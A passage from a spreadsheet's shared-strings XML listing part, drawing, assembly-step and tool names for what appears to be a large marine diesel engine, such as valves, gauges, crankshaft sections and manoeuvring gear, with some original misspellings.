  <si>
    <t>FUNNEL W. THREADED NIPPLE</t>
  </si>
  <si>
    <t>FUNNEL W. THREADED SOCKET</t>
  </si>
  <si>
    <t>FUNNEL WITOUT PIPE PIECE</t>
  </si>
  <si>
    <t>FUNNEL WITH FLANGE</t>
  </si>
  <si>
    <t>NIPPLE FOR VOC</t>
  </si>
  <si>
    <t>UNION WITH METRIC THREAD</t>
  </si>
  <si>
    <t>ADJUSTABLE COUPLING</t>
  </si>
  <si>
    <t>REDUCING ADAPTER MALE/FEM</t>
  </si>
  <si>
    <t>REDUCING ADAPTER FEM/FEM</t>
  </si>
  <si>
    <t>PLUGS FOR COUPLINGS</t>
  </si>
  <si>
    <t>CROSS-SCREWED CONNECTION</t>
  </si>
  <si>
    <t>ADJUSTABLE T-UNION</t>
  </si>
  <si>
    <t>T-UNION</t>
  </si>
  <si>
    <t>QUICK COUPLING, FEMALE</t>
  </si>
  <si>
    <t>QUICK COUPLING, COMPLETE</t>
  </si>
  <si>
    <t>PROTECTIVE PLUG</t>
  </si>
  <si>
    <t>PROTECTION CAP, QUICK COU</t>
  </si>
  <si>
    <t>QUICK COUPLING, MINIMESS</t>
  </si>
  <si>
    <t>PLUG, EXPANDER</t>
  </si>
  <si>
    <t>COMPENSATOR, GAS TYPE</t>
  </si>
  <si>
    <t>COMPENSATOR, STARTING AIR</t>
  </si>
  <si>
    <t>COMPENSATOR, FLUID TYPE</t>
  </si>
  <si>
    <t>COMPENSATOR, RECTANGULAR</t>
  </si>
  <si>
    <t>FILTER SCREEN</t>
  </si>
  <si>
    <t>OIL DRAIN TRAP</t>
  </si>
  <si>
    <t>INSERT FOR OIL SEPARATOR</t>
  </si>
  <si>
    <t>HEAT EXCHANGER-TUBE</t>
  </si>
  <si>
    <t>HEAT EXCHANGER-PLATE</t>
  </si>
  <si>
    <t>PIPE BEND - 30 DEG.</t>
  </si>
  <si>
    <t>CONICAL VALVE 0-15</t>
  </si>
  <si>
    <t>CONICAL VALVE.16-24</t>
  </si>
  <si>
    <t>CONICAL VALVE.25-49</t>
  </si>
  <si>
    <t>CONICAL VALVE 50-</t>
  </si>
  <si>
    <t>CONICAL VALVE, ANGLE</t>
  </si>
  <si>
    <t>CONICAL VALVE-ANGLE 50-</t>
  </si>
  <si>
    <t>VALVE WITH ACTUATOR</t>
  </si>
  <si>
    <t>ANGLE VALVE</t>
  </si>
  <si>
    <t>BUTTERFLY VALVE-HOUSING</t>
  </si>
  <si>
    <t>BUTTERFLY VALVE-FLAP</t>
  </si>
  <si>
    <t>ELFI/ELVA CONTROL VALVE</t>
  </si>
  <si>
    <t>3/2-WAY VALVE, PNEUMATIC</t>
  </si>
  <si>
    <t>4/2-WAY VALVE, PNEUMATIC</t>
  </si>
  <si>
    <t>3/2-WAY MANUAL VALVE</t>
  </si>
  <si>
    <t>4/2-WAY MANUAL VALVE</t>
  </si>
  <si>
    <t>5/2-WAY MANUAL VALVE</t>
  </si>
  <si>
    <t>5/2-WAY VALVE</t>
  </si>
  <si>
    <t>FUSIBLE VALVE</t>
  </si>
  <si>
    <t>FLOAT VALVE</t>
  </si>
  <si>
    <t>DISCHARGE VALVE,AIR/WATER</t>
  </si>
  <si>
    <t>CONICAL VALVE STRAIGHTWAY</t>
  </si>
  <si>
    <t>CONICAL VALVE ANGLE-WAY</t>
  </si>
  <si>
    <t>SLIDE VALVE-STRAIGHTWAY</t>
  </si>
  <si>
    <t>DIRECTIONAL VALVE</t>
  </si>
  <si>
    <t>FILLING AND TESTING VALVE</t>
  </si>
  <si>
    <t>COCK WITH ANGLE PLUG</t>
  </si>
  <si>
    <t>THREE - WAY COCK</t>
  </si>
  <si>
    <t>BALL VALVE, FLANGE CONN.</t>
  </si>
  <si>
    <t>BALL VALVE,WELDED CONN.</t>
  </si>
  <si>
    <t>BALL VALVE,MANIFOLD MOUNT</t>
  </si>
  <si>
    <t>CARTRIDGE VALVE, 2-WAY</t>
  </si>
  <si>
    <t>CARTRIDGE VALVE</t>
  </si>
  <si>
    <t>CONTROL COVER,CARTRIDGE V</t>
  </si>
  <si>
    <t>CONTROL COVER+CONTROLLER</t>
  </si>
  <si>
    <t>EQUALISING VALVE</t>
  </si>
  <si>
    <t>HYDR. PUMP, HAND OPERETED</t>
  </si>
  <si>
    <t>PUMP-SCREW WHEEL TYPE</t>
  </si>
  <si>
    <t>PUMP-GEAR WHEEL TYPE</t>
  </si>
  <si>
    <t>PUMP-PISTON TYPE</t>
  </si>
  <si>
    <t>PUMP-CENTRIFUGAL</t>
  </si>
  <si>
    <t>BOOSTER PUMP FOR ACTUATOR</t>
  </si>
  <si>
    <t>GREASE GUN</t>
  </si>
  <si>
    <t>AIR CYLINDER - PISTON ROD</t>
  </si>
  <si>
    <t>WICK LUBRICATOR</t>
  </si>
  <si>
    <t>BOOSTER ACCUMULATOR</t>
  </si>
  <si>
    <t>PRESS.CONVERTER-PISTON</t>
  </si>
  <si>
    <t>HOMOGENIZER</t>
  </si>
  <si>
    <t>PRESSURE GAUGE DIAL TYPE</t>
  </si>
  <si>
    <t>DIAL METER-PRESSURE UNIT</t>
  </si>
  <si>
    <t>PRESSURE GAUGE, U-TUBE</t>
  </si>
  <si>
    <t>PRESSURE GAUGE CASE</t>
  </si>
  <si>
    <t>PRESSURE GAUGE SCALE</t>
  </si>
  <si>
    <t>PRESSURE GAUGE DETAILS</t>
  </si>
  <si>
    <t>THERMOMETER+TEMP.SENSOR</t>
  </si>
  <si>
    <t>THERM.,DIAL TYPE,STRAIGHT</t>
  </si>
  <si>
    <t>THERMOMETER-STRAIGHT</t>
  </si>
  <si>
    <t>THERMOMETER WITH POCKET</t>
  </si>
  <si>
    <t>THERMOMETER,LIQUID,ANGLE</t>
  </si>
  <si>
    <t>PNEUMATIC PRESSURE GAUGE</t>
  </si>
  <si>
    <t>VISCOTHERM HOUSING ASSY</t>
  </si>
  <si>
    <t>FLOW REGULATOR</t>
  </si>
  <si>
    <t>FUEL OIL SUPPLY UNIT</t>
  </si>
  <si>
    <t>CAMSHAFT LUBRICATING UNIT</t>
  </si>
  <si>
    <t>STUFFING BOX OIL UNIT</t>
  </si>
  <si>
    <t>AIR COOLER CLEANING UNIT</t>
  </si>
  <si>
    <t>CLOCK</t>
  </si>
  <si>
    <t>WATER METER</t>
  </si>
  <si>
    <t>LEVEL GAUGE</t>
  </si>
  <si>
    <t>EL.MOTOR, GEARED-A.C.</t>
  </si>
  <si>
    <t>EL.MOTOR WITH FLANGE-A.C.</t>
  </si>
  <si>
    <t>EL.MOTOR WITH FEET-A.C.</t>
  </si>
  <si>
    <t>GENERATOR</t>
  </si>
  <si>
    <t>TRANSFORMER AND RECTIFIER</t>
  </si>
  <si>
    <t>EL PRESSURE GAUGE</t>
  </si>
  <si>
    <t>EL.INSTRUMENT-PRESSURE</t>
  </si>
  <si>
    <t>PRESSURE MONITORING UNIT</t>
  </si>
  <si>
    <t>DIFFERENTIAL PRESSURESTAT</t>
  </si>
  <si>
    <t>EL.INSTRUMENT-TEMPERATURE</t>
  </si>
  <si>
    <t>HEATING ELEMENT</t>
  </si>
  <si>
    <t>EL.INSTRUMENT-VOLTAGE</t>
  </si>
  <si>
    <t>REVOLUTION COUNTER</t>
  </si>
  <si>
    <t>PMI CONTROLLER BOX</t>
  </si>
  <si>
    <t>ANGLE ENCODER</t>
  </si>
  <si>
    <t>ZEBRA BAND</t>
  </si>
  <si>
    <t>PRESSURE TRANSDUCER COMPL</t>
  </si>
  <si>
    <t>THOMPSON ADAPTER</t>
  </si>
  <si>
    <t>SYNCHRONIZATION BOX</t>
  </si>
  <si>
    <t>PARTS FOR PICK UP</t>
  </si>
  <si>
    <t>SYNCHRONIZATION SENSOR</t>
  </si>
  <si>
    <t>SYNC. SENSOR COMPLETE</t>
  </si>
  <si>
    <t>PMI CONTROLLER BOX COMPL.</t>
  </si>
  <si>
    <t>VIBRATION MONITORING</t>
  </si>
  <si>
    <t>VIBRATION ALARM</t>
  </si>
  <si>
    <t>CUP FOR FLOW CONTROL</t>
  </si>
  <si>
    <t>RUN-OUT METER,ELECTRONIC</t>
  </si>
  <si>
    <t>PROXIMETER/PROBE-ELECTRON</t>
  </si>
  <si>
    <t>SEMI-CONDUCTOR</t>
  </si>
  <si>
    <t>UNIT</t>
  </si>
  <si>
    <t>MULTI PURPOSE CONTROLLER</t>
  </si>
  <si>
    <t>ALPHACOMM UNIT</t>
  </si>
  <si>
    <t>HMI PANEL</t>
  </si>
  <si>
    <t>LUBRICATOR CONTROL UNIT</t>
  </si>
  <si>
    <t>REPEATER</t>
  </si>
  <si>
    <t>PC HARDVARE</t>
  </si>
  <si>
    <t>PRINTER</t>
  </si>
  <si>
    <t>PRINTED CIRCUITBOARD ASSY</t>
  </si>
  <si>
    <t>AXIAL VIBRATION MONITOR</t>
  </si>
  <si>
    <t>CABLES, MOUNTING INSTR.</t>
  </si>
  <si>
    <t>CABLE GLAND, COMPLETE</t>
  </si>
  <si>
    <t>FUSIBLE PLUG</t>
  </si>
  <si>
    <t>CONNECTORS</t>
  </si>
  <si>
    <t>CONNECTOR, HEAVY DUTY</t>
  </si>
  <si>
    <t>MULTIPLE PLUG</t>
  </si>
  <si>
    <t>CONNECTOR, PCB</t>
  </si>
  <si>
    <t>CONNECTOR-PCB, KIT</t>
  </si>
  <si>
    <t>CABLE DUCT</t>
  </si>
  <si>
    <t>SUSPENSIONS</t>
  </si>
  <si>
    <t>DIFF.PRESS.TRANSMITTER</t>
  </si>
  <si>
    <t>ELECTRICAL PILOT UNIT</t>
  </si>
  <si>
    <t>MECHANICAL PILOT UNIT</t>
  </si>
  <si>
    <t>PRESSURE TRANSDUCER</t>
  </si>
  <si>
    <t>PNEUMATIC PILOT UNIT</t>
  </si>
  <si>
    <t>POSITION TRANSMITTER</t>
  </si>
  <si>
    <t>AUTOMATIC REGULATION</t>
  </si>
  <si>
    <t>BULB</t>
  </si>
  <si>
    <t>FLUORESCENT TUBE</t>
  </si>
  <si>
    <t>FLUORESCENT LUMINAIRE</t>
  </si>
  <si>
    <t>PROBELIGHT</t>
  </si>
  <si>
    <t>SWITCH 0-110 VOLTS</t>
  </si>
  <si>
    <t>SWITCH 111-...VOLTS</t>
  </si>
  <si>
    <t>PARTS FOR SWITCH</t>
  </si>
  <si>
    <t>ENCLOSURE, COMPLETE</t>
  </si>
  <si>
    <t>TERMINAL STRIP</t>
  </si>
  <si>
    <t>ENCLOSURE, TERMINAL RACK</t>
  </si>
  <si>
    <t>ANGLE PLUG</t>
  </si>
  <si>
    <t>MULTIBLE SOCKET</t>
  </si>
  <si>
    <t>ELECTRICAL PREHEATER</t>
  </si>
  <si>
    <t>CONTROLLER</t>
  </si>
  <si>
    <t>LAMP GLASSES-MAN.CONSOLE</t>
  </si>
  <si>
    <t>THROTTLE VALVE-LUB.OIL</t>
  </si>
  <si>
    <t>SUPPORT F.F.W.DISTR. PIPE</t>
  </si>
  <si>
    <t>SCREW-HEXAGON HEAD</t>
  </si>
  <si>
    <t>SPECIAL THREAD TOLERANCES</t>
  </si>
  <si>
    <t>TIGHTNING/DISMOUNT. NUTS</t>
  </si>
  <si>
    <t>FITTED STUDS &amp; BOLTS</t>
  </si>
  <si>
    <t>SEALANT-SILICONE PASTE</t>
  </si>
  <si>
    <t>SECURING OF STUDS</t>
  </si>
  <si>
    <t>BASIC SYMBOLS,PIPE PLANTS</t>
  </si>
  <si>
    <t>ADHESIVE/SILICONE RUBBER</t>
  </si>
  <si>
    <t>ADHESIVE FOR METAL</t>
  </si>
  <si>
    <t>UNKNOWN DRAWING</t>
  </si>
  <si>
    <t>FOREIGN DRAWING</t>
  </si>
  <si>
    <t>PURCH.SPEC.-CRANKSHAFT</t>
  </si>
  <si>
    <t>FLARE FOR TUBES</t>
  </si>
  <si>
    <t>PIPE-CONNECTIONPARTS</t>
  </si>
  <si>
    <t>MALE STUD ELBOW COUPLINGS</t>
  </si>
  <si>
    <t>COUPLINGS FOR MANOMETER</t>
  </si>
  <si>
    <t>MALE STUD TEE COUPLINGS</t>
  </si>
  <si>
    <t>PRESS. GAUGE PANEL MOUNT.</t>
  </si>
  <si>
    <t>JETASSIST BOX</t>
  </si>
  <si>
    <t>PARTS FOR TERMINAL BOX</t>
  </si>
  <si>
    <t>F/I CONVERTER</t>
  </si>
  <si>
    <t>MOUNT. OF CABLE UNIONS</t>
  </si>
  <si>
    <t>INDICATION PLATE</t>
  </si>
  <si>
    <t>EXT. WIRING DIAGRAM</t>
  </si>
  <si>
    <t>CONN.F.PICK-UP M.I.START</t>
  </si>
  <si>
    <t>WOODWARD EQUIPMENT</t>
  </si>
  <si>
    <t>PRESSURE REDUKTION VALVE</t>
  </si>
  <si>
    <t>DATA SHEET</t>
  </si>
  <si>
    <t>PROTECTIVE SCREW</t>
  </si>
  <si>
    <t>BRAKE FOR TRAVEL.TROLLEY</t>
  </si>
  <si>
    <t>DISTANCE PIECE FOR YOKE</t>
  </si>
  <si>
    <t>HYDRAULIC DIAGRAM</t>
  </si>
  <si>
    <t>ROUND-NOSED TOOL,RIGHT</t>
  </si>
  <si>
    <t>ROUND-NOSED TOOL,LEFT</t>
  </si>
  <si>
    <t>PROFILE TOOL</t>
  </si>
  <si>
    <t>CAMF.TOOL,FORE/AFT FLANGE</t>
  </si>
  <si>
    <t>SPRING TOOL</t>
  </si>
  <si>
    <t>SKIVING TOOL,UPSIDE DOWN</t>
  </si>
  <si>
    <t>MULTI-BOTTOM,UPSIDE DOWN</t>
  </si>
  <si>
    <t>LIST OF MEASURING BLOCKS</t>
  </si>
  <si>
    <t>SEALING RING-SPECIAL</t>
  </si>
  <si>
    <t>INSTRUCTIONS FOR GLUE</t>
  </si>
  <si>
    <t>LONG SCREW W.SOCKET+NUT</t>
  </si>
  <si>
    <t>EXPECTED NOISE LEVELS</t>
  </si>
  <si>
    <t>CONNECTORS,MOUNTING INSTR</t>
  </si>
  <si>
    <t>TORQUE ACTUATOR PNEUMATIC</t>
  </si>
  <si>
    <t>FLUORESCENT LUMINA. COMPL</t>
  </si>
  <si>
    <t>Assembly of panel</t>
  </si>
  <si>
    <t>Assembly of box</t>
  </si>
  <si>
    <t>Assembly of sensor</t>
  </si>
  <si>
    <t>BEDPLATE ALIGN AND REAM</t>
  </si>
  <si>
    <t>BEDPLATE SECTION</t>
  </si>
  <si>
    <t>LOW.SHELLS+CRANKSH. CHECK</t>
  </si>
  <si>
    <t>TURNING WHEEL (805)</t>
  </si>
  <si>
    <t>THRUST SHAFT+TURN.WHEEL</t>
  </si>
  <si>
    <t>CRANK JOURNALS FILE OFF</t>
  </si>
  <si>
    <t>SCRAPER RING GUARD DRILL</t>
  </si>
  <si>
    <t>GUARD 'FORE' DRILL + FIX</t>
  </si>
  <si>
    <t>FRAMEB./GIRDER REAM+ALIGN</t>
  </si>
  <si>
    <t>BEDPLATE/FRAME BOX REAM</t>
  </si>
  <si>
    <t>DRILL FOR BRACING SCREW</t>
  </si>
  <si>
    <t>COVERS+RELIEF VALVE MOUNT</t>
  </si>
  <si>
    <t>COVERS+RELIFE VALVE MOUNT</t>
  </si>
  <si>
    <t>COWERS+RELIEF VALVE MOUNT</t>
  </si>
  <si>
    <t>GUIDES ALIGN + REAM</t>
  </si>
  <si>
    <t>LONG STAYBOLTS+SUPP.IRONS</t>
  </si>
  <si>
    <t>CRANK BEARINGS+CONN.RODS</t>
  </si>
  <si>
    <t>CRANK BEARINGS/CONN.RODS</t>
  </si>
  <si>
    <t>CRANK BEARINGS+CORN.RODS</t>
  </si>
  <si>
    <t>CYL.FRAME ALIGN ON FRAMEB</t>
  </si>
  <si>
    <t>CUL.FRAME ALIGN ON FRAMEB</t>
  </si>
  <si>
    <t>THRUST BEARING MEASURE</t>
  </si>
  <si>
    <t>ROL.GD.HOUS+REV.MECH(827)</t>
  </si>
  <si>
    <t>ROL.GDE.HOUS+REV MECH</t>
  </si>
  <si>
    <t>SHORT STAYBOLTS FIT</t>
  </si>
  <si>
    <t>SCAV.AIR RECEIV. ASSEMBLE</t>
  </si>
  <si>
    <t>PISTONS MOUNT AND ALIGN</t>
  </si>
  <si>
    <t>ROL.GDE+CAMSH.HOUS.ALIGN</t>
  </si>
  <si>
    <t>CRANK BEARINGS CHECK</t>
  </si>
  <si>
    <t>CHAINS MOUNT+ADJUST ENGI.</t>
  </si>
  <si>
    <t>PIST.COOL.+OUTLET PIPE MO</t>
  </si>
  <si>
    <t>CYL.COV.+WATER CONN.MOUNT</t>
  </si>
  <si>
    <t>CYL.COV.+MISC.VALVES(831)</t>
  </si>
  <si>
    <t>CYL.COV.+MISC.VALVES</t>
  </si>
  <si>
    <t>VALVE GEAR+FUEL PUMP</t>
  </si>
  <si>
    <t>CONTROL SHAFT ALIGN + PIN</t>
  </si>
  <si>
    <t>PIPES FOR: 831</t>
  </si>
  <si>
    <t>PIPES FOR: 833</t>
  </si>
  <si>
    <t>PIPES FOR: 838</t>
  </si>
  <si>
    <t>LUBRICATORS + GOVERNOR</t>
  </si>
  <si>
    <t>CYL.FRAMES MOUNT + ALIGN</t>
  </si>
  <si>
    <t>CYL. FRAMES MOUNT + ALIGN</t>
  </si>
  <si>
    <t>CYL.FRAMES REAM+ASSEMBLE</t>
  </si>
  <si>
    <t>PUMPS+AUTOM. F.REVERSING</t>
  </si>
  <si>
    <t>MANOEUVRING GEAR MOUNT</t>
  </si>
  <si>
    <t>MANOUVRING GEAR MOUNT</t>
  </si>
  <si>
    <t>MANDEUVRING GEAR MOUNT</t>
  </si>
  <si>
    <t>FRAME SECTION DISMANTLE</t>
  </si>
  <si>
    <t>FRAME SECT.ALIGN ON BEDPL</t>
  </si>
  <si>
    <t>DISASSEMBLE TOP SECTION</t>
  </si>
  <si>
    <t>DIS ASSEMBLE TOP SECTION</t>
  </si>
  <si>
    <t>ASSEMBLE TOP SECTION</t>
  </si>
  <si>
    <t>TOP SECTION</t>
  </si>
  <si>
    <t>CHAIN TIGHT.+GUIDEWAYS MO</t>
  </si>
  <si>
    <t>TOP+SCRAP.RING GUARD DRIL</t>
  </si>
  <si>
    <t>GUIDEWAYS IN UPPER PART</t>
  </si>
  <si>
    <t>CYL.FRAMES/LINERS FINISH</t>
  </si>
  <si>
    <t>INTERNAL CABLE DUCT</t>
  </si>
  <si>
    <t>ASSY OF MANOEUVR. CONSOLE</t>
  </si>
  <si>
    <t>ASSY OF MANDEUVR. CONSOLE</t>
  </si>
  <si>
    <t>ASSY OF MANOEUVR. CONCOLE</t>
  </si>
  <si>
    <t>ASSY OF MANOEUVR CONSOLE</t>
  </si>
  <si>
    <t>FINAL ERECTION</t>
  </si>
  <si>
    <t>MOUNT.,BRG.MONITORING SYS</t>
  </si>
  <si>
    <t>TURBOCH.+RECEIVER MOUNT.</t>
  </si>
  <si>
    <t>TURBOCH.+RECIVER MOUNT.</t>
  </si>
  <si>
    <t>VARIOUS THERMOMETER PIECE</t>
  </si>
  <si>
    <t>WATER BRAKE ALIGN</t>
  </si>
  <si>
    <t>TEST OIL ANF WATER</t>
  </si>
  <si>
    <t>FINISH DURING TEST</t>
  </si>
  <si>
    <t>FINICH DURING TEST</t>
  </si>
  <si>
    <t>STANDARD INSPECTION-1610</t>
  </si>
  <si>
    <t>STANDARD INSPECTION-1620</t>
  </si>
  <si>
    <t>STANDARD INSPECTION-4650</t>
  </si>
  <si>
    <t>STANDARD INSPECTION-4510</t>
  </si>
  <si>
    <t>LOWER GALLERY MAN.SIDE</t>
  </si>
  <si>
    <t>LOWER GALLERY MAN. SIDE</t>
  </si>
  <si>
    <t>REERECT.OF ENG.F.DISPATCH</t>
  </si>
  <si>
    <t>CENTRE GALLERY MAN.SIDE</t>
  </si>
  <si>
    <t>CENTRE GALLERY MAN. SIDE</t>
  </si>
  <si>
    <t>CENTER GALLERY MAN.SIDE</t>
  </si>
  <si>
    <t>GALL.ARR CENTRE REAR SIDE</t>
  </si>
  <si>
    <t>GALL.ARR.CENTRE REAR SIDE</t>
  </si>
  <si>
    <t>UPPER GALLERY MAN.SIDE</t>
  </si>
  <si>
    <t>UPPER GALL. REAR SIDE</t>
  </si>
  <si>
    <t>MOMENT COMPENS.ON CRANKSH</t>
  </si>
  <si>
    <t>MOMENT COMPENS ON CRANKSH</t>
  </si>
  <si>
    <t>OPERATION MARGIN AFT RUN.</t>
  </si>
  <si>
    <t>OPERATION MARGIN AFT RUN</t>
  </si>
  <si>
    <t>MOUNT+DISM.,GUIDE P.COMP.</t>
  </si>
  <si>
    <t>UNPACKING OF COMPONENTS</t>
  </si>
  <si>
    <t>TAKE-UP AND ASS. OF COMP.</t>
  </si>
  <si>
    <t>CLEANING OF TOP SECTION</t>
  </si>
  <si>
    <t>CLEAN  DURING FINAL ERECT</t>
  </si>
  <si>
    <t>MOMENTKOMPENSATOR</t>
  </si>
  <si>
    <t>CLASS SPARES + TOOLS LIST</t>
  </si>
  <si>
    <t>CLASS SPARES &amp; TOOLS LIST</t>
  </si>
  <si>
    <t>PACKINGS F.INSTALL.ENGINE</t>
  </si>
  <si>
    <t>CLEAN ENGINE BEF.TEST RUN</t>
  </si>
  <si>
    <t>CLEAN FRAMES</t>
  </si>
  <si>
    <t>CLEAN FRAMEBOX</t>
  </si>
  <si>
    <t>CLEAN ENGINE</t>
  </si>
  <si>
    <t>CLEAN TOP SECTION</t>
  </si>
  <si>
    <t>CLEAN CYLINDER FRAMES</t>
  </si>
  <si>
    <t>CLEANING OF BEDPLATE SECT</t>
  </si>
  <si>
    <t>CLEANING OF FRAME SECTION</t>
  </si>
  <si>
    <t>OPERATIONS WITHOUT COMP.</t>
  </si>
  <si>
    <t>SUPPL.DRG.-ASSEMBLY SECT.</t>
  </si>
  <si>
    <t>TEST INFONO-DRAWING ONLY</t>
  </si>
  <si>
    <t>CLASS SOCIETY</t>
  </si>
  <si>
    <t>MS 00 INSTALL.DRAWINGS</t>
  </si>
  <si>
    <t>TURBOCHARGER INFORMATION</t>
  </si>
  <si>
    <t>IN-LINE MAIN ENGINE</t>
  </si>
  <si>
    <t>V-TYPE MAIN ENGINE</t>
  </si>
  <si>
    <t>V-TYPE STATIONARY</t>
  </si>
  <si>
    <t>ENGINE PERFORMANCE</t>
  </si>
  <si>
    <t>DATA EXHAUST GAS</t>
  </si>
  <si>
    <t>ATTACHED CENTRIFUGAL PUMP</t>
  </si>
  <si>
    <t>CROSSHEAD ENGINE</t>
  </si>
  <si>
    <t>QUALITY PROCEDURE</t>
  </si>
  <si>
    <t>QUALITY SPECIFICATION</t>
  </si>
  <si>
    <t>INSPEC. SPECIFICATIONS</t>
  </si>
  <si>
    <t>FUEL OIL SPECIFICATION</t>
  </si>
  <si>
    <t>ENGINE DESCRIPTION</t>
  </si>
  <si>
    <t>LUB. OIL SPECIFICATION</t>
  </si>
  <si>
    <t>INSPECTION OF WELDINGS</t>
  </si>
  <si>
    <t>WELDING INSTRUC. FOR PIPE</t>
  </si>
  <si>
    <t>PAINTING INSTRUCTION</t>
  </si>
  <si>
    <t>LUB. OIL IN BASE FRAME</t>
  </si>
  <si>
    <t>MS 01 BEDPLATE</t>
  </si>
  <si>
    <t>OIL PAN     REGISTER BLAD</t>
  </si>
  <si>
    <t>MS 101 TOOLS</t>
  </si>
  <si>
    <t>MS 04 CUTT.PLAN-PLATELIST</t>
  </si>
  <si>
    <t>BEDPLATE-CAST</t>
  </si>
  <si>
    <t>MS 02 ENGINE FRAMEBOX</t>
  </si>
  <si>
    <t>MS 04 SCAVENGING BOX</t>
  </si>
  <si>
    <t>MS 19+22 STAY BOLTS</t>
  </si>
  <si>
    <t>MS 104 TOOLS-KEF ENGINES</t>
  </si>
  <si>
    <t>MS 119 TOOLS-KEF ENGINES</t>
  </si>
  <si>
    <t>FRAMES-CAST</t>
  </si>
  <si>
    <t>FRAMES-WELDED</t>
  </si>
  <si>
    <t>SCAVENGE BOX-CAST</t>
  </si>
  <si>
    <t>SCAVENGE BOX-WELDED</t>
  </si>
  <si>
    <t>COVERS FOR FRAMES</t>
  </si>
  <si>
    <t>INTERM.FRAME-CAST</t>
  </si>
  <si>
    <t>INTERM.FRAME-WELDED</t>
  </si>
  <si>
    <t>END FRAME</t>
  </si>
  <si>
    <t>FRAME SECTION-ALL WELDED</t>
  </si>
  <si>
    <t>FRAME SECTION-ALL CAST</t>
  </si>
  <si>
    <t>MS 14 VAR.PARTS-FRAM.-K74</t>
  </si>
  <si>
    <t>GUARDS</t>
  </si>
  <si>
    <t>MS 15 GUARDS AND COVERS</t>
  </si>
  <si>
    <t>MS 115 TOOLS-KEF ENGINES</t>
  </si>
  <si>
    <t>GUARDS ON END-FRAME</t>
  </si>
  <si>
    <t>MS 05 CYLINDER FRAME</t>
  </si>
  <si>
    <t>MS 101 TOOLS-KEF ENGINES</t>
  </si>
  <si>
    <t>MS 06 CYLINDER COVER</t>
  </si>
  <si>
    <t>MS 101 TOOLS-CYL COV.-KEF</t>
  </si>
  <si>
    <t>MS 07 CRANKSHAFT</t>
  </si>
  <si>
    <t>MS 16 AXIAL VIBR.DETUNER</t>
  </si>
  <si>
    <t>MS 107 TOOLS-CRANKSH.-KEF</t>
  </si>
  <si>
    <t>MS 55 MOMENT COMPENSATOR</t>
  </si>
  <si>
    <t>CRANKSHAFT FULLY-BUILT</t>
  </si>
  <si>
    <t>CRANKSHAFT SEMI-BUILT</t>
  </si>
  <si>
    <t>CRANKSH. ONE-PIECE FORGED</t>
  </si>
  <si>
    <t>MS 08 CONNECTING ROD</t>
  </si>
  <si>
    <t>MS 108 TOOLS-CONN.ROD-KEF</t>
  </si>
  <si>
    <t>MS 10 PISTON W.PISTON ROD</t>
  </si>
  <si>
    <t>PISTON ROD COMPLETE</t>
  </si>
  <si>
    <t>MS 10 PISTON</t>
  </si>
  <si>
    <t>MS 110 TOOLS-PISTON-KEF</t>
  </si>
  <si>
    <t>PISTON COOLING MS-08</t>
  </si>
  <si>
    <t>PISTON COOLING MS-02</t>
  </si>
  <si>
    <t>PISTON COOLING MS-01</t>
  </si>
  <si>
    <t>PISTON COOLING MS-04</t>
  </si>
  <si>
    <t>PISTON COOLING MS-05</t>
  </si>
  <si>
    <t>MS 12 EXHAUST VALVE</t>
  </si>
  <si>
    <t>PIPE ON EXHAUST VALVE</t>
  </si>
  <si>
    <t>MS 19 STARTING VALVE</t>
  </si>
  <si>
    <t>MS 20 SAFETY VALVE</t>
  </si>
  <si>
    <t>SAFETY VALVES</t>
  </si>
  <si>
    <t>MS 37 VALVE GEAR (MECH.)</t>
  </si>
  <si>
    <t>MS 137 TOOLS-KEF ENG.</t>
  </si>
  <si>
    <t>ROCKER ARM AND BRACKET</t>
  </si>
  <si>
    <t>HYDR.VALVE GEAR</t>
  </si>
  <si>
    <t>MS 33 CAMSHAFT</t>
  </si>
  <si>
    <t>MS 133 TOOLS-KEF ENGINES</t>
  </si>
  <si>
    <t>MS 29 CAMSHAFT</t>
  </si>
  <si>
    <t>FUEL FUMP + EXHAUST VALVE</t>
  </si>
  <si>
    <t>BEARINGS</t>
  </si>
  <si>
    <t>EXHAUST VALVE GEAR</t>
  </si>
  <si>
    <t>MS 31 REVERSING MECHANISM</t>
  </si>
  <si>
    <t>MS 32 CHAIN DRIVE-LOWER</t>
  </si>
  <si>
    <t>REV.MECHANISM AND CHAIN</t>
  </si>
  <si>
    <t>CHAIN AND CHAIN WHEEL</t>
  </si>
  <si>
    <t>REVERSING(HYDRAULIC)</t>
  </si>
  <si>
    <t>SPARE PARTS LIST</t>
  </si>
  <si>
    <t>STANDARD INSTRUMENTS</t>
  </si>
  <si>
    <t>SPECIAL INSTRUMENTS</t>
  </si>
  <si>
    <t>DISA TACHOMETERS</t>
  </si>
  <si>
    <t>THERMOM.AND PRESS.GAUGES</t>
  </si>
  <si>
    <t>H.2.O PRESSURE GAUGE</t>
  </si>
  <si>
    <t>CONTROL DRAIN</t>
  </si>
  <si>
    <t>PRESSURE GAUGE ARR.</t>
  </si>
  <si>
    <t>MS 36 FUEL PUMP</t>
  </si>
  <si>
    <t>MS 28 MANOEUVRING CONSOLE</t>
  </si>
  <si>
    <t>MS 27 REGULATING SHAFT</t>
  </si>
  <si>
    <t>MS 42 GOVERNOR</t>
  </si>
  <si>
    <t>ASS. OF PRESSURESTAT</t>
  </si>
  <si>
    <t>ARR. OF PICK-UPS</t>
  </si>
  <si>
    <t>MS 23+45 MANOEUVR.SYSTEM</t>
  </si>
  <si>
    <t>MAIN SECTION 24</t>
  </si>
  <si>
    <t>MAIN SECTION 26</t>
  </si>
  <si>
    <t>MS 45 MANOEUVRING SYSTEM</t>
  </si>
  <si>
    <t>PUMP AND AUTOMATICS</t>
  </si>
  <si>
    <t>MAIN SECTION 30</t>
  </si>
  <si>
    <t>MS 38 INDICATOR DRIVE</t>
  </si>
  <si>
    <t>MS 54 INDICATOR DRIVE</t>
  </si>
  <si>
    <t>INDICATOR GEAR</t>
  </si>
  <si>
    <t>MS 40+56 SCAV.AIR RECEIV.</t>
  </si>
  <si>
    <t>MAIN SECTION 44+66</t>
  </si>
  <si>
    <t>MAIN SECTION 94</t>
  </si>
  <si>
    <t>CHARGING AIR PIPE-UPPER</t>
  </si>
  <si>
    <t>CHARGING AIR PIPE-LOWER</t>
  </si>
  <si>
    <t>STAND-BY BLOWER</t>
  </si>
  <si>
    <t>MAIN SECTION 41</t>
  </si>
  <si>
    <t>MAIN SECTION 141</t>
  </si>
  <si>
    <t>EXHAUST ARR.</t>
  </si>
  <si>
    <t>ARR.OUTLET PIPE</t>
  </si>
  <si>
    <t>ORDER LIST-VIBRALARM</t>
  </si>
  <si>
    <t>TOOLS-EXHAUST PIPE</t>
  </si>
  <si>
    <t>CLEANING NOZZLE-TURBOCH.</t>
  </si>
  <si>
